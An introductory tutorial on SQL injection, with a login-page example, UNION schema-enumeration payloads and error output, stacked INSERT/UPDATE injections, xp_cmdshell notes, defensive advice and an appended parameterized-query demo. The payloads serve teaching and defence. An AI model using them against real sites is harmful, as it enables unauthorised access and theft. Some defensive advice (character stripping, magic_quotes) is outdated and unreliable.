Understanding Sql Injection




Understanding Sql Injection Hardik Shah

Introduction:

SQL injection is a technique used by a malicious user to gain illegal access to remote machines through a vulnerability in a web application. The basic idea behind this technique is to run an SQL query which the programmer never intended to run. The technique relies heavily on logical operations such as AND, OR and UNION; used properly, it can give a malicious user complete access to a web server. If the application naively builds SQL strings on the fly (dynamic queries) and then runs them, it can create some real surprises, as we will see later on.

How it is performed:

This vulnerability occurs due to a lack of proper validation of user-entered data in web applications. It may be that the programmer is a newcomer and does not understand this kind of attack. But in many of the cases I have seen, programmers are simply too lazy to consider and apply proper security checks. Most programmers believe that the client or end user will always give correct input to the application. They check for minor things like empty strings or null values, but they never consider the fact that a user can insert a specially crafted query which reveals all the important information on your machines. With the outsourcing boom many companies have started up with less experienced programmers, so this kind of attack is widespread in today's web applications.

Take the simple example of a login page. A programmer generally uses pseudo code like this (assume that the database server is MS SQL Server):

```
query = "select * from userinfo where username='" & struser & "' and password='" & strpass & "'"
strcheck = getqueryresult(query)
if strcheck = "" then
    loginflg = false
else
    loginflg = true
end if
```

This query works fine without any problems if the user enters ordinary characters. But suppose a malicious user enters the following as the password:

```
' or 1=1 --
```

Now the above query becomes:

```
select * from userinfo where username='test' and password='' or 1=1 --'
```

The symbol -- denotes a comment in SQL Server, so everything after -- is ignored. The query therefore actually becomes:

```
select * from userinfo where username='test' and password='' or 1=1
```

We can break this condition into two portions:

p => username='test' and password=''
q => 1=1

So we can write it as p v q. From Boolean algebra we know that in a V (OR) operation the result is true if either value is true. The value of q is always true, as 1 is always equal to 1, so the entire expression (p v q) always evaluates to TRUE. With p and q substituted for ease of reading, the query is:

```
query = "select * from userinfo where pvq"
```

Since p v q is always true, the query selects all the records in the table. But a programmer generally takes one record for the login, so the username becomes the username of the first record. Consider the following table:

```
No.  username  password
1    test      test
2    temp      temp
```

If the above query is executed against this table, the username becomes test. Hence, by executing the malformed query, a malicious user can bypass the authentication mechanism of the web application. And this is only one among endless options an intruder can use. With a specially crafted query a user can retrieve the entire database schema of your application, upload or download files, read other information such as credit card numbers stored in the database, delete users, add new users, and so on.

Different types of attacks:

1) SELECT UNION: The UNION operation permits combining two results, so a user can use it to retrieve any sensitive information from the database. Taking the query above, suppose the user enters the following in the password field:

```
' or 1=1 union select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES --
```

On executing this query the database engine gives an error something like this:

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'userinfo' to a column of data type int.
/testpage.aspx, line 25
```

From this error it is clear that the table name is userinfo. After determining the table name, the user needs to find the column names in the table, so he can enter the following:

```
' or 1=1 union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='userinfo' --
```

Output:

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/testpage.aspx, line 25
```

The error message shows that the first field or column in userinfo is login_id. To get the next column name, type:

```
' or 1=1 union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='userinfo' and COLUMN_NAME not in ('login_id') --
```

Output:

```
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/testpage.aspx, line 25
```

In this way a user can gain information about the tables, usernames, passwords and so on.

2) SELECT INSERT: With the INSERT keyword a user can easily add new records to the database. Given that we know the partial structure of the members table, we can try adding a new record to it: if this works, we will simply be able to log in directly with our newly inserted credentials. Look at the following query:

```
SELECT email, passwd, login_id, full_name FROM members WHERE email = 'test@test.com';
INSERT INTO members (email, passwd, login_id, full_name) VALUES ('test@test.com', 'hello', 'test', 'test'); --'
```

Depending on the implementation and the database permissions this query may work, and one can log in using the user name "test" and password "test". It might fail, however, if there is a different table which holds the user's access rights and other details, or if the web application's database user does not have INSERT permission on the user table.

3) SELECT UPDATE: As discussed above, the SELECT INSERT attack may fail depending on various conditions. In that case, the forgot password button seems a nice way of getting into the system:

```
SELECT email, passwd, login_id, full_name FROM members WHERE email = 'test@test.com';
UPDATE members SET email = 'malicious_user_mail@mail.com' WHERE email = 'test@test.com'; --'
```

These are the general techniques. Based on combinations of the various SQL keywords, say LIKE, CREATE, DROP, WHERE and so on, one can perform many different kinds of attack.

Built-in stored procedures:

Another technique, in the case of SQL Server, is to use SQL Server's stored procedures. A default installation of SQL Server contains many stored procedures which a malicious user can easily misuse. One of them is xp_cmdshell: Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the web server is possible.

If xp_cmdshell is enabled, a malicious user can run arbitrary commands on the web server. Access to xp_cmdshell is usually limited to administrative accounts, but it is possible to grant it to lesser users, not to mention that many SQL Server installations run with the default user sa and a blank password.

How to protect web applications from SQL injection attacks:

You can see that these attacks work easily on many sites; there are many programmers who never validate data properly. If you are a web application developer you must secure your application against such attacks. The following are proposed solutions by which you can avoid them:

1) Data sanitization: remove any unwanted characters, say ', ", ; or the comment sequence --, from the user input. Allowing these characters may allow SQL injection attacks on your website. But sometimes you need to allow certain special characters, say ', since a name can be O'Reilly.

2) Limit database permissions: make sure you give the user only the necessary permissions. Allowing unrestricted access may cause trouble, as discussed above: a malicious user can use the built-in stored procedures to perform attacks.

3) Use stored procedures: if possible, use properly formatted stored procedures instead of dynamic queries in your web applications. This reduces the chance of such attacks.

4) Use a quote function: use built-in functions like magic_quotes in the case of PHP to properly format the user input. This will prevent such attacks.

Hardik Shah
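As an added example (not part of the original article), the login page described above is run against a constructed userinfo table, with the article's dynamic query beside a parameterized version of the same query. sqlite3 stands in for MS SQL Server, which is an assumption; both treat ' as a string delimiter and -- as a line comment, so the bypass behaves the same way.

```python
import sqlite3

# Constructed sample data standing in for the article's userinfo table.
# sqlite3 is used as an offline stand-in for MS SQL Server (an assumption);
# like SQL Server it treats ' as a string delimiter and -- as a line comment.
ROWS = [("test", "test"), ("temp", "temp")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table userinfo (username text, password text)")
    conn.executemany("insert into userinfo values (?, ?)", ROWS)
    return conn


CONN = setup_db()


def login_dynamic(struser, strpass):
    """Vulnerable: the query is built by string concatenation, exactly as in
    the article's pseudo code, so user input becomes part of the SQL text.
    Returns the username of the first matching row, or None."""
    query = ("select username from userinfo where username='" + struser
             + "' and password='" + strpass + "'")
    row = CONN.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(struser, strpass):
    """Hardened: the same query with placeholders. The driver passes the
    values separately from the SQL text, so a quote or -- in the input is
    compared as data and never changes the query's structure."""
    query = "select username from userinfo where username=? and password=?"
    row = CONN.execute(query, (struser, strpass)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' or 1=1 --"                        # the article's password input
    print(login_dynamic("nobody", payload))        # test: bypass, first row wins
    print(login_parameterized("nobody", payload))  # None: input treated as data
    print(login_parameterized("temp", "temp"))     # temp: normal login still works
```

Note that the dynamic version returns the first user even for a username that does not exist, which is exactly the p v q effect worked through above.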